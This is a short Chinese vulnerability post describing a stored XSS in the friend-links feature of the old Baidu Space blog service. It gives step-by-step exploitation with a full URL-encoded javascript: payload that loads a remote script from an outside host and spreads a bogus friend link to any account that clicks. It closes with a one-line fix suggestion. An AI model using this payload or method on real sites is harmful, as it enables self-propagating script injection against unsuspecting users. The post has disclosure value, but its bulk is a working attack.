严重程度可构成XSS蠕虫,本人chrome测试成功! 简单的说就是新版百度空间中友情链接中缺少对JS字符的过滤,导致了储存反射型XSS跨站脚本 漏洞 。你信不信我反正是信了,下面给出利用方法。 1,首先打开自己的百度空间,模板设置-添加友情链接-并在链接处插入恶意代码 javascript:function%20loadjs%28filename%29%7Bvar%20fileref%3Ddocument.createElement%28%27script%27%29%3Bfileref.setAttribute%28%22type%22%2C%22text%2Fjavascript%22%29%3Bfileref.setAttribute%28%22src%22%2Cfilename%29%3Bif%28typeof%20fileref%21%3D%22undefined%22%29%7Bdocument.getElementsByTagName%28%22head%22%29%5B0%5D.appendChild%28fileref%29%7D%7Dloadjs%28%22http%3A%2F%2Fwt.cnwt.asia%2Fa.js%3Fid%3Dfuck%22%2C%22js%22%29%3Bwindow.open%28%27http%3A%2F%2Ftop.baidu测试数据%2F%27%29%3B
2.随便用一个小号点击刚刚插入恶意代码的百度空间中的友情链接。
3.发现小号的友情链接中多了一个"百度新鲜事好礼送不停"的不明友情链接。此时目的已达到。
修复方案: 经过服务端处理的时候在链接前面加上"http://",再显示出来!
查看更多关于百度空间友情链接储存反射型XSS - 网站安全 - 自的详细内容...